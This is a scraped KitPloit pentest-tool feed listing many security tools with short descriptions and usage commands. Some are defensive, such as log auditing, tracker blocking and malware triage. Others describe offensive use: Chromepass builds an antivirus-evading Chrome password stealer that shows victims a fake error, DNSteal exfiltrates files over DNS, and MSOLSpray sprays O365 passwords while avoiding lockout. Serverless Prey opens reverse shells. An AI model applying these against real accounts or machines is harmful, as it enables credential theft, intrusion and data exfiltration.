Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

HikPwn - A Simple Scanner For Hikvision Devices

$
0
0

HikPwn, a simple scanner for Hikvision devices with basic vulnerability scanning capabilities written in Python 3.8. This project was born out of curiosity while I was capturing and watching network traffic generated by some of Hikvision's software and devices.

Setup instructions:
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
pip install -r requirements.txt

Tested on:
  • Python 3.8 on Linux 4.19 x86_64

Functions and characteristics:
  • Passive discovery of Hikvision devices.
  • Active discovery and enumeration of Hikvision devices via UDP probing.
Work in progress... stay tuned!

TODO:
  • Add detection and exploitation capabilities for ICSA-17-124-01.

Help:
usage: hikpwn.py [-h] --interface INTERFACE --address ADDRESS [--active]

HikPwn, a simple scanner for Hikvision devices with basic vulnerability scanning capabilities written in Python 3.8. by Ananke: https://github.com/4n4nk3.

optional arguments:
-h, --help show this help message and exit
--interface INTERFACE the network interface to use
--address ADDRESS the ip address of the selected network interface
--active enable "active" discovery

Censored preview:
Using eth0 as network interface and XXX.XXX.XXX.XXX as its IP address...

[*] Started 30 seconds of both passive and active discovery...

[*] Active discovery's results:

DEVICE #1:
LABEL DATA
--------------------------------------------------
Serial Number xxxxxxxxxxxxxxxxxxxxx
Description DS-2DE4220IW-D
MAC XX-XX-XX-XX-XX-XX
IP XXX.XXX.XXX.XX
DHCP in use false
Software Version V5.4.3build 160810
DSP Version V7.3 build 160801
Boot Time 2019-03-01 00:05:33
Activation Status true
Password Reset Ability true


[*] Passive discovery didn't find any device.
This project is for educational purposes only. Don't use it for illegal activities. I don't support nor condone illegal or unethical actions and I can't be held responsible for possible misuse of this software.



SSHPry v2.0 - Spy and Control os SSH Connected client's TTY

Angrgdb - Use Angr Inside GDB - Create An Angr State From The Current Debugger State

$
0
0
Use angr inside GDB. Create an angr state from the current debugger state.

Install
pip install angrgdb
echo "python import angrgdb.commands" >> ~/.gdbinit

Usage
angrgdb implements the angrdbg API in GDB.
You can use it in scripts like this:
from angrgdb import *

gdb.execute("b *0x004005f9")
gdb.execute("r aaaaaaaa")

sm = StateManager()
sm.sim(sm["rax"], 100)

m = sm.simulation_manager()
m.explore(find=0x00400607, avoid=0x00400613)

sm.to_dbg(m.found[0]) #write input to GDB

gdb.execute("x/s $rax")
#0x7fffffffe768: "ais3{I_tak3_g00d_n0t3s}"
gdb.execute("c")
#Correct! that is the secret key!
You can also use angrgdb commands directly in GDB for simple stuffs:
  • angrgdb sim <register name> [size] Symbolize a register
  • angrgdb sim <address> [size] Symbolize a memory area
  • angrgdb list List all items that you setted as symbolic
  • angrgdb find <address0> <address1> ... <addressN> Set the list of find targets
  • angrgdb avoid <address0> <address1> ... <addressN> Set the list of avoid targets
  • angrgdb reset Reset the context (symbolic values and targets)
  • angrgdb run Generate a state from the debugger state and run the exploration
  • angrgdb shell Open an shell with a StateManager instance created from the current GDB state
  • angrgdb interactive Generate a state from the debugger state and explore by hand using a modified version of angr-cli
An example crackme solve using angrgdb+GEF+idb2gdb:


Loading scripts in GDB
This is a tip if you don't want to use angrgdb from the cli but you want to use a python script. To load a script in GDB use source script.py.

TODO
  • add remote angrdbg like in IDAngr


OSSEM - Open Source Security Events Metadata

$
0
0

The Open Source Security Events Metadata (OSSEM) is a community-led project that focuses primarily on the documentation and standardization of security event logs from diverse data sources and operating systems. Security events are documented in a dictionary format and can be used as a reference for projects like the ThreatHunter-Playbook while mapping data sources to data analytics used to validate the detection of adversarial techniques. In addition, the project provides a common information model (CIM) that can be used for data engineers during data normalization procedures to allow security analysts to query and analyze data across diverse data sources. Finally, the project also provides docu mentation about the structure and relationships identified in specific data sources to facilitate the development of data analytics.

Goals
  • Define and share a common information model in order to improve the data standardization and transformation of security event logs
  • Define and share data structures and relationships identified in security events logs
  • Provide detailed information in a dictionary format about several security event logs to the community
  • Learn more about security event logs (Windows, Linux & MacOS)
  • Have fun and think more about the data structure in your SIEM when it comes down to detection!!

Project Structure
There are four main folders:
  • Common Information Model (CIM):
    • Facilitates the normalization of data sets by providing a standard way to parse security event logs
    • It is organized by specific entities associated with event logs and defined in more details by Data Dictionaries
    • The definitions of each entity and its respective field names are mostly general descriptions that could help and expedite event logs parsing procedures.
  • Data Dictionaries:
    • Contains specific information about several security event logs organized by operating system and their respective data sets
    • Each dictionary describes a single event log and its corresponding event field names
    • The difference between the Common Information Model folder and the data dictionaries is that in the CIM the field definitions are more general whereas in a data dictionary, each field name definition is unique to the specific event log.
  • Detection Data Model:
    • Focuses on defining the required data in form of data objects and the relationships among each other needed to facilitate the creation of data analytics and validate the detection of adversary techniques
    • This is inspired by the awesome work of MITRE with their project CAR Analytics
    • The information needed for each data object is pulled from the entities defined in the Common Information Model
  • ATTACK Data Sources:
    • Focuses on the documentation of data sources suggested or associated with techniques defined in the Enterprise Matrix
    • In addition, here is where data sources will be mapped with specific data objects defined in the Detection Data Model part of the project with the main goal of creating a link between techniques, data sources and data analytics

Current Status: Alpha
The project is currently in an alpha stage, which means that the content is still changing. We welcome any feedback and suggestions to improve the project.

Projects Using OSSEM
  • HELK currently updating its pipeline configs

Resources

Author

Current Committers


DNSteal v2.0 - DNS Exfiltration Tool For Stealthily Sending Files Over DNS Requests

$
0
0
This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.
Below are a couple of different images showing examples of multiple file transfer and single verbose file transfer:

  • Support for multiple files
  • Gzip compression supported
  • Now supports the customisation of subdomains and bytes per subdomain and the length of filename

See help below:


If you do not understand the help, then just use the program with default options!
python dnsteal.py 127.0.0.1 -z -v
This one would send 45 bytes per subdomain, of which there are 4 in the query. 15 bytes reserved for filename at the end.
python dnsteal.py 127.0.0.1 -z -v -b 45 -s 4 -f 15
This one would leave no space for filename.
python dnsteal.py 127.0.0.1 -z -v -b 63 -s 4 -f 0


Git-Hound v1.1 - GitHound Pinpoints Exposed API Keys On GitHub Using Pattern Matching, Commit History Searching, And A Unique Result Scoring System

$
0
0

A batch-catching, pattern-matching, patch-attacking secret snatcher.

GitHound pinpoints exposed API keys and other sensitive information on GitHub using pattern matching, commit history searching, and a unique result scoring system. GitHound has earned me over $7500 applied to Bug Bounty research. Corporate and Bug Bounty Hunter use cases are outlined below.

Features
  • GitHub/Gist code searching. This enables GitHound to locate sensitive information exposed across all of GitHub, uploaded by any user.
  • Generic API key detection using pattern matching, context, and Shannon entropy.
  • Commit history digging to find improperly deleted sensitive information (for repositories with <6 stars)..
  • Scoring system to emphasize confident results, filter out common false positives, and to optimize intensive repo digging.
  • Base64 detection and decoding
  • Options to build GitHound into your workflow, like custom regexes and results-only output mode.

Usage
echo "tillsongalloway.com" | git-hound or git-hound --subdomain-file subdomains.txt

Setup
  1. Download the latest release of GitHound
  2. Create a ./config.yml or ~/.githound/config.yml with your GitHub username and password (2FA accounts are not supported). See config.example.yml.
    1. If it's your first time using the account on the system, you may receieve an account verification email.
  3. echo "tillsongalloway.com" | git-hound

Use cases

Corporate: Searching for exposed customer API keys
Knowing the pattern for a specific service's API keys enables you to search GitHub for these keys. You can then pipe matches for your custom key regex into your own script to test the API key against the service and to identify the at-risk account.
echo "api.halcorp.biz" | githound --dig --many-results --regex-file halcorp-api-regexes.txt --results-only | python halapitester.py
For detecting future API key leaks, GitHub offers Push Token Scanning to immediately detect API keys as they are posted.

Bug Bounty Hunters: Searching for leaked employee API tokens
My primary use for GitHound is for finding sensitive information for Bug Bounty programs. For high-profile targets, the --many-results hack and --languages flag are useful for scraping>100 pages of results.
echo "uberinternal.com" | githound --dig --many-results --languages common-languages.txt --threads 100

Flags
  • --subdomain-file - The file with the subdomains
  • --dig-files - Clone and search the repo's files for results
  • --dig-commits - Clone and search the repo's commit history for results
  • --many-results - Use result sorting and filtering hack to scrape more than 100 pages of results
  • --results-only - Print only regexed results to stdout. Useful for piping custom regex matches into another script
  • --no-repos - Don't search repos
  • --no-gists - Don't search Gists
  • --threads - Specify max number of threads for the commit digger to use.
  • --regex-file - Supply a custom regex file
  • --language-file - Supply a custom file with languages to search.
  • --config-file - Custom config file (default is config.yml)
  • --pages - Max pages to search (default is 100, the page maximum)
  • --no-scoring - Don't use scoring to filter out false positives
  • --no-api-keys - Don't perform generic API key searching. GitHound uses common API key patterns, context clues, and a Shannon entropy filter to find potential exposed API keys.
  • --no-files - Don't flag interesting file extensions
  • --only-filtered - Only search filtered queries (languages)
  • --debug - Print verbose debug messages.

Related tools
  • GitRob is an excellent tool that specifically targets an organization or user's repositories for exposed credentials and displays them on a beautiful web interface.


MSOLSpray - A Password Spraying Tool For Microsoft Online Accounts (Azure/O365)

$
0
0

A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.
BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!

Why another spraying tool?
Yes, I realize there are other password spraying tools for O365/Azure. The main difference with this one is that this tool not only is looking for valid passwords, but also the extremely verbose information Azure AD error codes give you. These error codes provide information relating to if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, if the account is disabled, if the password is expired and much more.
So this doubles, as not only a password spraying tool but also a Microsoft Online recon tool that will provide account/domain enumeration. In limited testing it appears that on valid login to the Microsoft Online OAuth2 endpoint it isn't auto-triggering MFA texts/push notifications making this really useful for finding valid creds without alerting the target.
Lastly, this tool works well with FireProx to rotate source IP addresses on authentication requests. In testing this appeared to avoid getting blocked by Azure Smart Lockout.

Quick Start

You will need a userlist file with target email addresses one per line. Open a PowerShell terminal from the Windows command line with 'powershell.exe -exec bypass'.
Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020

Invoke-MSOLSpray Options
UserList  - UserList file filled with usernames one-per-line in the format "user@domain.com"
Password - A single password that will be used to perform the password spray.
OutFile - A file to output valid results to.
Force - Forces the spray to continue and not stop when multiple account lockouts are detected.
URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from.


Tails 4.5 - Live System to Preserve Your Privacy and Anonymity

$
0
0

The Tails team is happy to publish Tails 4.5, the first version of Tails to support Secure Boot.
This release also fixes many security vulnerabilities. You should upgrade as soon as possible.

New features

Secure Boot

Tails now starts on computers with Secure Boot enabled.
If your Mac displays the following error:
Security settings do not allow this Mac to use an external startup disk.
Then you have to change the settings of the Startup Security Utility of your Mac to authorize starting from Tails.

Changes and updates

  • Update Tor Browser to 9.0.9.
    This update fixes several vulnerabilities in Firefox, including some critical ones.
    Mozilla is aware of targeted attacks in the wild abusing these vulnerabilities.

Known issues

None specific to this release.
See the list of long-standing issues.

Get Tails 4.5

To upgrade your Tails USB stick and keep your persistent storage

  • Automatic upgrades are available from Tails 4.2 or later to 4.5.
  • If you cannot do an automatic upgrade or if Tails fails to start after an automatic upgrade, please try to do a manual upgrade.

To install Tails on a new USB stick

Follow our installation instructions:
All the data on this USB stick will be lost.




Tentacle - A POC Vulnerability Verification And Exploit Framework

$
0
0

Tentacle is a POC vulnerability verification and exploit framework. It supports free extension of exploits and uses POC scripts. It supports calls to zoomeye, fofa, shodan and other APIs to perform bulk vulnerability verification for multiple targets. (Still in DEV...)

Install
pip3 install -r requestment.txt

Usage
When you run it for the first time, the configuration file conf/tentacle.conf will be generated automatically.
# Show help for tentacle.
python3 tentacle.py --help

# Show all modual, and you can see it in `script` path.
python3 tentacle.py --show

# Show all function of module by -f show or -f help
python3 tentacle.py -m script/web/web_status -f show
python3 tentacle.py -m script/web/web_status -f help

# Load target by iS/iN/iF/iT/iX/iE/gg/sd/ze/ff.
# Scan port and then it will try to send the poc.
python3 tentacle.py -m script/web/web_status -iS www.examples.com # Load target by url or host
python3 tentacle.py -m script/web/web_status -iN 192.168.111.0/24 # Load target by network
python3 tentacle.py -m script/web/web_status -iF target.txt # Load target by file
python3 tentacle.py -m script/web/web_status -iT dcc54c3e1cc2c2e1 # Load target by recode's target
python3 tentacle.py -m script/web/web_status -iX nmap_xml.xml # Load target by nmap.xml
python3 tentacle.py -m script/web/web_status -iE "powered by discuz" # Load target by baidu/bing/360so
python3 tentacle.py -m script/web/web_status -gg 'intext:powered by discuz' # Load target by google api
python3 tentacle.py -m script/web/web_status -sd 'apache' # Load target by shodan api
python3 tentacle.py -m script/web/web_status -ze 'app:weblogic' # Load target by zoomeye api
python3 tentacle.py -m script/web/web_status -ff 'domain="example.com"' # Load target by fofa api

# Load modual by -m (e.g. script/info/web_status,@web)
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status # Load web_status module
python3 tentacle.py -iS 127.0.0.1 -m @web # Load all module of web path
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status,@web # Load all module of web path and web_status module
python3 tentacle.py -iS 127.0.0.1 -m "*" # Load all module of script path

# Set port scan scope
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status # Scan top 150 ports and then perform bulk vulnerability verification for multiple targets.
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status -sP # Skip port scan and then it will try the default port number server
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status -lP 80-90,443 # Scan 80-90 ports and 443 port and then perform bulk vulnerability verification for multiple targets.

# Use function of modual by -m and -f (e.g. -m web_status -f prove), and you should make sure the function of module is exist.
python3 tentacle.py -m script/web/web _status -f prove

# Show task's result by -tS
python3 tentacle.py -tS 8d4b37597aaec25e

# Export task's result by -tS to test.xlsx
python3 tentacle.py -tS 8d4b37597aaec25e -o test

# Update by git
python3 tentacle.py --update

Update
  • [2018-11-15] Code refactoring and fix bug.
  • [2019-06-08] Code refactoring and add port scan.
  • [2020-03-15] Code refactoring and add script.

Thanks
  1. Sqlmap
  2. POC-T


Chromepass - Hacking Chrome Saved Passwords

$
0
0

Chromepass is a python-based console application that generates a windows executable with the following features:
  • Decrypt Chrome saved paswords
  • Send a file with the login/password combinations remotely (email or reverse-http)
  • Custom icon
  • Completely undetectable by AntiVirus Engines

AV Detection!
Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed using a variety of websites
  • VirusTotal Scan (0/68) 30-09-2019
    • this is an educational project, so distribution (or the lack thereof) is not a concern, hence the usage of VirusTotal
  • AntiScan (0/26) 24-09-2019
  • Hibrid Analysis All Clean (CrowdStrike Falcon, MetaDefender and Virustotal) 24-09-2019

Getting started

Dependencies and Requirements
This is a very simple application, which uses only:
  • Python - Only tested on 3.7.4 but should work in 3.6+

Installation
Chromepass requires Python 3.6+ to run.
Install the dependencies:
> cd chromepass
> pip install -r requirements.txt
If any errors occur make sure you're running on the proper environment (if applcable) and that you have python 3.6+ (preferably 3.7.4). If the errors persist, try:
> python -m pip install --upgrade pip
> python -m pip install -r requirements.txt

Usage
Chromepass is very straightforward. Start by running:
> python create_server.py
It will ask you to select between two options:
  • (1) via email[To be fixed]
    • This will ask you for an email address and a password
    • It will then ask you if you wish to send to another address or to yourself
    • Next, you're asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable, after the passwords have been transferred.
    • You can then write your own message or leave it blank
    • You're done! Wait for the executable to be generated and then it's ready.
  • (2) via client.exe[Recommended at the moment]
    • First you're asked to input an IP Address for a reverse connection. This is the address that belongs to the attacker. It can be a local IP address or a remote IP Address. If a remote address is chosen, Port Forwarding needs to be in place.
    • You're then asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable, after the passwords have been transferred.
    • You can then write your own message or leave it blank
    • You're done! Wait for the executables to be generated and then it's ready.
    • The client.exe must be started before the server_ip.exe. The server_ip.exe is the file the victim receives.
  • Note: To set a custom icon, replace icon.ico by the desired icon with the same name and format.

Todo
  • Sending Real-time precise location of the victim (completed, releases next update)
  • Also steal Firefox passwords (Completed, releases next update)
  • Option of installing a backdoor allowing remote control of the victim's computer (completed, releases next update)
  • Support for more email providers (in progress)
  • Also steal passwords from other programs, such as keychains(in progress)
  • Add Night Mode (in progress)

Errors, Bugs and feature requests
If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement please report it in the issue pages.
Please follow the templates shown when creating the issue.

Learn More
For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking
If you wish to contact me, you can do so via: marionascimento@itsec.us

Disclaimer
I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.


Richkit - Domain Enrichment Toolkit

$
0
0

Richkit is a python3 package that provides tools taking a domain name as input, and returns addtional information on that domain. It can be an analysis of the domain itself, looked up from data-bases, retrieved from other services, or some combination thereof.
The purpose of richkit is to provide a reusable library of domain name-related analysis, lookups, and retrieval functions, that are shared within the Network Security research group at Aalborg University, and also availble to the public for reuse and modification.
Documentation can be found at https://richkit.readthedocs.io/en/latest/.

Requirements
  • Python >= 3.5

Installation
In order to install richikit just type in the terminal pip install richkit

Usage
The following codes can be used to retrieve the TLD and the URL category, respectively.
  • Retriving effective top level domain of a given url:
    >>> from richkit.analyse import tld
    >>> urls = ["www.aau.dk","www.github.com","www.google.com"]
    >>>
    >>> for url in urls:
    ... print(tld(url))
    dk
    com
    com
  • Retriving category of a given url:
    >>> from richkit.retrieve.symantec import fetch_from_internet
    >>> from richkit.retrieve.symantec import LocalCategoryDB
    >>>
    >>> urls = ["www.aau.dk","www.github.com","www.google.com"]
    >>>
    >>> local_db = LocalCategoryDB()
    >>> for url in urls:
    ... url_category=local_db.get_category(url)
    ... if url_category=='':
    ... url_category=fetch_from_internet(url)
    ... print(url_category)
    Education
    Technology/Internet
    Search Engines/Portals

Modules
Richkit define a set of functions categorized by the following modules:
  • richkit.analyse: This module provides functions that can be applied to a domain name. Similarly to richkit.lookup, and in contrast to richkit.retrieve, this is done without disclosing the domain name to third parties and breaching confidentiality.
  • richkit.lookup: This modules provides the ability to look up domain names in local resources, i.e. the domain name cannot be sent of to third parties. The module might fetch resources, such as lists or databasese, but this must be done in a way that keeps the domain name confidential. Contrast this with richkit.retrieve.
  • richkit.retrieve: This module provides the ability to retrieve data on domain names of any sort. It comes without the "confidentiality contract" of richkit.lookup.

Credits


Eavesarp - Analyze ARP Requests To Identify Intercommunicating Hosts And Stale Network Address Configurations (SNACs)

$
0
0

A reconnaissance tool that analyzes ARP requests to identify hosts that are likely communicating with one another, which is useful in those dreaded situations where LLMNR/NBNS aren't in use for name resolution.

Requirements/Installation
This is only gon' work on Kali or other Debian-based Linux distributions
eavesarp requires Python3.7 and Scapy. After installing Python, run the following to install Scapy: python3.7 -m pip install -r requirements.txt

General Usage

Capturing ARP Requests
Notes:
  • eavesarp requires root privileges to sniff from the interface and craft ARP packets.
  • Captured output is automatically written to disk under the name eavesarp.db to prevent having to recapture ARP requests.

Passive Execution
The most basic form of execution is:
sudo ./eavesarp.py capture -i eth1
This will initialize eavesarp such that ARP requests will be captured, analyzed, and relevant output will be presented to the user in a table. Use --help for additional information on non-standard arguments. Note that the stale column indicates [UNCONFIRMED] when an ARP request originating from a target (as a sender) has not yet been observed when running in this mode. Enable ARP resolution via the -ar flag to determine if a given target address has gone stale.
 ___ ___ __  _____ ___ ___ ________
/ -_) _ `/ |/ / -_|_-</ _ `/ __/ _ \
\__/\_,_/|___/\__/___/\_,_/_/ / .__/
-----------------------------/ /---
[LISTEN CAREFULLY] /_/

Capture interface: eth1
ARP resolution: disabled
DNS resolution: disabled
Requests analyzed: 65

SNAC Sender Target ARP# Stale
------ ------------- -------------- ------ -------------
192.168.86.5 192.168.86.101 29 [UNCONFIRMED]
192.168.86.3 1
192.168.86.3 192.168.86.37 25 [UNCONFIRMED]
192.168.86.38 7 [UNCONFIRMED]
192.168.86.5 1
192.168.86.99 1
192.168.86.99 192.168.86.3 1

Active Execution (ARP Resolution, DNS Resolution)
Enable ARP and DNS resolution by including the -ar and -dr flags. Keep in mind that this makes the tool non-passive, but the advantage is that DNS records, MAC addresses, and a confirmation of SNACs status is returned.
sudo ./eavesarp.py capture -i eth1 -ar -dr --blacklist 192.168.86.5
We can clearly see from the output below which senders are affected by one or more SNACs and the affected addresses. The final column indicates if a potential MITM opportunity is present. eavesarp checks to see if the FWD address of the PTR resolved for a given sender is different. If so, it may be an indicator that the intended target has moved to the new FWD address. Applying an alias to the interface of our attacking host may allow us to forward the traffic to the intended target and capture information in transit.
 ___ ___ __  _____ ___ ___ ________
/ -_) _ `/ |/ / -_|_-</ _ `/ __/ _ \
\__/\_,_/|___/\__/___/\_,_/_/ / .__/
-----------------------------/ /---
[LISTEN CAREFULLY] /_/

Capture interface: eth1
ARP resolution: enabled
DNS resolution: enabled
Requests analyzed: 55

SNAC Sender Target ARP# Stale Sender PTR Target PTR MITM
------ ------------- -------------- ------ ------- -------------- ---------------- ---------------------------------------------
True 192.168.86.2 192.168.86.101 21 True iron.aa.local. syslog.aa.local. T-IP:192.168.86.101 != PTR-FWD:192.168.86.102
True 192.168.86.3 192.168.86.38 17 True crux.aa.local.
192.168.86.37 15 True
192.168.86.99 1 w10.aa.local.
192.168.86.99 192.168.86.3 1 w10. aa.local. crux.aa.local.

Analyzing PCAP Files and SQLite Databases (generated by eavesarp)
eavesarp can accept SQLite databases and PCAP files for analysis. It will output the extracted values to a new database file for further analysis. See the --help flag for more information on this process, however basic execution is demonstrated below.
sudo ./eavesarp.py analyze -sfs eavesarp.db  -cp disable --blacklist 192.168.86.5 --csv-output-file eavesarp_analysis.db
SNAC    Sender         Target            ARP#  Stale    Sender PTR      Target PTR        MITM
------ ------------- -------------- ------ ------- -------------- ---------------- ---------------------------------------------
True 192.168.86.2 192.168.86.101 21 True iron.aa.local. syslog.aa.local. T-IP:192.168.86.101 != PTR-FWD:192.168.86.102
True 192.168.86.3 192.168.86.38 17 True crux.aa.local.
192.168.86.37 15 True
192.168.86.99 1 w10.aa.local.
192.168.86.99 192.168.86.3 1 w10.aa.local. crux.aa.local.
- Writing csv output to eavesarp_analysis.db
...and the CSV output looks like...
arp_count,sender,sender_mac,target,target_mac,stale,sender_ptr,target_ptr,target_forward,mitm_op,snac
21,192.168.86.2,74:d4:35:1a:b5:fb,192.168.86.101,[STALE TARGET],True,iron.aa.local.,syslog.aa.local.,192.168.86.102,T-IP:192.168.86.101 != PTR-FWD:192.168.86.102,True
17,192.168.86.3,b8:27:eb:a9:5c:8f,192.168.86.38,[STALE TARGET],True,crux.aa.local.,,,False,True
15,192.168.86.3,b8:27:eb:a9:5c:8f,192.168.86.37,[STALE TARGET],True,crux.aa.local.,,,False,True
1,192.168.86.99,08:00:27:22:49:c5,192.168.86.3,b8:27:eb:a9:5c:8f,False,w10.aa.local.,crux.aa.local.,192.168.86.3,False,False
1,192.168.86.3,b8:27:eb:a9:5c:8f,192.168.86.99,08:00:27:22:49:c5,False,crux.aa.local.,w10.aa.local.,192.168.86.99,False,True


Ps-Tools - An Advanced Process Monitoring Toolkit For Offensive Operations

$
0
0

Having a good technical understanding of the systems we land on during an engagement is a key condition for deciding what is going to be the next step within an operation. Collecting and analysing data of running processes from compromised systems gives us a wealth of information and helps us to better understand how the IT landscape from a target organisation is setup. Moreover, periodically polling process data allows us to react on changes within the environment or provide triggers when an investigation is taking place.
To be able to collect detailed process data from compromised end-points we wrote a collection of process tools which brings the power of these advanced process utilities to C2 frameworks (such as Cobalt Strike).

More info about the tools and used techniques can be found on the following Blog: https://outflank.nl/blog/2020/03/11/red-team-tactics-advanced-process-monitoring-techniques-in-offensive-operations/

The following functionality is included in the toolkit:
Psx: Shows a detailed list of all processes running on the system.
Psk: Shows detailed kernel information including loaded driver modules.
Psc: Shows a detailed list of all processes with Established TCP connections.
Psm: Show detailed module information from a specific process id (loaded modules, network connections e.g.).
Psh: Show detailed handle information from a specific process id (object handles, network connections e.g.).
Psw: Show Window titles from processes with active Windows.

Usage:
Download the Outflank-Ps-Tools folder and load the Ps-Tools.cna script within the Cobalt Strike Script Manager.
Use the Beacon help command to display syntax information.
This project is written in C/C++
You can use Visual Studio to compile the reflective dll's from source.

Credits
Author: Cornelis de Plaa (@Cneelis) / Outflank
Shout out to: Stan Hegt (@StanHacked) and all my other great colleagues at Outflank


Lunar - A Lightweight Native DLL Mapping Library That Supports Mapping Directly From Memory

$
0
0

A lightweight native DLL mapping library that supports mapping directly from memory

Features
  • Imports and delay imports are resolved
  • Relocations are performed
  • Image sections are mapped with the correct page protection
  • Exception handlers are initialised
  • A security cookie is generated and initialised
  • DLL entry point and TLS callbacks are called

Getting started
The example below demonstrates a simple implementation of the library
var libraryMapper = new LibraryMapper(process, dllBytes);

// Map the DLL into the process

libraryMapper.MapLibrary();

// Unmap the DLL from the process

libraryMapper.UnmapLibrary();

Constructors
LibraryMapper(Process, Memory<byte>)
Provides the functionality to map a DLL from memory into a remote process
LibraryMapper(Process, string)
Provides the functionality to map a DLL from disk into a remote process

Properties
DllBaseAddress
The base address of the DLL in the remote process after it has been mapped

Methods
MapLibrary()
Maps the DLL into the remote process
UnmapLibrary()
Unmaps the DLL from the remote process

Caveats
  • Mapping requires the presence of a PDB for ntdll.dll, and, so, the library will automatically download the latest version of this PDB from the Microsoft symbol server and cache it in %appdata%/Lunar/Dependencies


Serverless Prey - Serverless Functions For Establishing Reverse Shells To Lambda, Azure Functions, And Google Cloud Functions

$
0
0

Serverless Prey is a collection of serverless functions (FaaS), that, once launched to a cloud environment and invoked, establish a TCP reverse shell, enabling the user to introspect the underlying container:
  • Panther: AWS Lambda written in Node.js
  • Cougar: Azure Function written in C#
  • Cheetah: Google Cloud Function written in Go
This repository also contains research performed using these functions, including documentation on where secrets are stored, how to extract sensitive data, and identify monitoring / incident response data points.

Disclaimer
Serverless Prey functions are intended for research purposes only and should not be deployed to production accounts. By their nature, they provide shell access to your runtime environment, which can be abused by a malicious actor to exfiltrate sensitive data or gain unauthorized access to related cloud services.

Contributors
Eric Johnson - Principal Security Engineer, Puma Security
Brandon Evans - Senior Application Security Engineer, Asurion

Learning More





Audix - A PowerShell Tool To Quickly Configure The Windows Event Audit Policies For Security Monitoring

$
0
0

Audix will allow for the SIMPLE configuration of Windows Event Audit Policies. Window's Audit Policies are restricted by default. This means that for Incident Responders, Blue Teamers, CISO's & people looking to monitor their environment through use of Windows Event Logs, must configure the audit policy settings to provide more advanced logging.
This utility, aims to capture the current audit policy setting, perform a backup of it (incase a restore to previous state is required) and apply a more advanced Audit Policy setting to allow for better detection capability. In addition, it will enforce audit policy subcategories to ensure that these advance setting persist. There is also a setting to adjust the logging size limit.
Some examples of enabled policy settings that Audix will enable:
-Event ID: 4698-4702 (A scheduled task was created/updated/disabled)
-Event ID: 4688 (A new process has been created.)

Running Audix
Git Clone the repo
git clone https://github.com/littl3field/Audix.git
Navigate to the folder and execute the command in your terminal. You must ensure you have Administrator rights to do this.
.\Audix.ps1

Development
  • I will be adding these settings as a priority:
    • Increase logging size limit (DONE)
    • Enforce audit policy subcategory setting (DONE)
  • Add restore option
  • GPO Setting Configuration

Please note: This tool will only change the local security policy. If applied to a host with a GPO setting, it is best to use the same settings in a Group Policy default profile so all systems get the same config. If the GPO profile is not changed to meet these settings, a GPO force will override it.


Privacy Badger - A Browser Extension That Automatically Learns To Block Invisible Trackers

$
0
0

Privacy Badger is a browser extension that automatically learns to block invisible trackers. Instead of keeping lists of what to block, Privacy Badger learns by watching which domains appear to be tracking you as you browse the Web.

Privacy Badger sends the Do Not Track signal with your browsing. If trackers ignore your wishes, your Badger will learn to block them. Privacy Badger starts blocking once it sees the same tracker on three different websites.

Besides automatic tracker blocking, Privacy Badger removes outgoing link click tracking on Facebook, Google and Twitter, with more privacy protections on the way.


Inhale - A Malware Analysis And Classification Tool

$
0
0

Inhale is a malware analysis and classification tool that is capable of automating and scaling many static analysis operations.
This is the beta release version, for testing purposes, feedback, and community development.

Background
Inhale started as a series of small scripts that I used when collecting and analyzing a large amount of malware from diverse sources. There are plenty of frameworks and tools for doing similar work, but none of them really matched my work flow of quickly finding, classifying, and storing information about a large number of files. Some also require expensive API keys and other services that cost money.
I ended up turning these scripts into something that people can quickly set up and use, whether you run from a research server, a laptop, or a low cost computer like a Raspberry Pi.

Install
This tool is built to run on Linux using Python3, ElasticSearch, radare2, yara and binwalk. jq is also needed to pretty print output from the database. Here are some of the basic instructions to install.

Python3
Install requirements
python3 -m pip install -r requirements.txt

Installing ElasticSearch (Debian)
Documentation
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
sudo apt-get install apt-transport-https
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt-get update && sudo apt-get install elasticsearch
sudo service elasticsearch start
You can also install manually by following this documentation
Additionally you can set up a full ELK stack for visualization and data analysis purposes. It is not necessary for using this tool.

Installing radare2
It's important to install radare2 from the repo, and not your package manager. Package manager versions don't come with all the bells and whistles required for inhale.
git clone https://github.com/radare/radare2
cd radare2
sys/install.sh

Installing Yara
Documentation
sudo apt-get install automake libtool make gcc
wget https://github.com/VirusTotal/yara/archive/v3.10.0.tar.gz
tar xvzf v3.10.0.tar.gz
cd yara-3.10.0/
./bootstrap.sh
./configure
make
sudo make install
If you get any errors about shared objects, try this to fix it.
sudo sh -c 'echo "/usr/local/lib" >> /etc/ld.so.conf'
sudo ldconfig

Installing binwalk
It's most likely best to simply install binwalk from the repo.
git clone https://github.com/ReFirmLabs/binwalk
cd binwalk
sudo python3 setup.py install
More information on installing additional features for binwalk is located here.

Usage
Specify the file you are scraping by type:
-f infile    
-d directory
-u url
-r recursive url
Other options:
-t TAGS        Additional Tags
-b Turn off binwalk signatures with this flag
-y YARARULES Custom Yara Rules
-o OUTDIR Store scraped files in specific output dir (default:./files/<date>/)
-i Just print info, don't add files to database

Examples
Running inhale.py will perform all of the analysis on a given file/directory/url and print it to your terminal.
View info on /bin/ls, but don't add to the database
